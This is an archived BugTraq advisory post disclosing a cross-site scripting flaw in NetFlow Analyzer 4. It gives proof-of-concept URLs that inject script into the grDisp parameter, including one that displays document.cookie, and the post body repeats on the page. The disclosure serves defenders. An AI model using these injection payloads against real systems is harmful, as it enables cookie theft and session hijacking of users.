BugTraq
Back to list
|
Post reply
NetFlow Analyzer 4 XSS Vulnerability
Oct 18 2005 03:37AM
why nsfocus com
NetFlow Analyzer 4
http://manageengine.adventnet.com/products/netflow/
I encountered Cross Site Scripting Vulnerabilities in some files of the NetFlow Analyzer 4, with this files, sending a specially crafted url you can execute commands in the client side.
____Proof of Concept______
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grD
isp=<h1>test</h1>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grD
isp=<script>alert("test")</script>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grD
isp=<script>alert(document.cookie)</script>
Why, why (at) nsfocus (dot) com [email concealed]
[ reply ]
Privacy Statement
Copyright 2010, SecurityFocus
http://manageengine.adventnet.com/products/netflow/
I encountered Cross Site Scripting Vulnerabilities in some files of the NetFlow Analyzer 4, with this files, sending a specially crafted url you can execute commands in the client side.
____Proof of Concept______
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grD
isp=<h1>test</h1>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grD
isp=<script>alert("test")</script>
http://192.168.10.7:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grD
isp=<script>alert(document.cookie)</script>
Why, why (at) nsfocus (dot) com [email concealed]
[ reply ]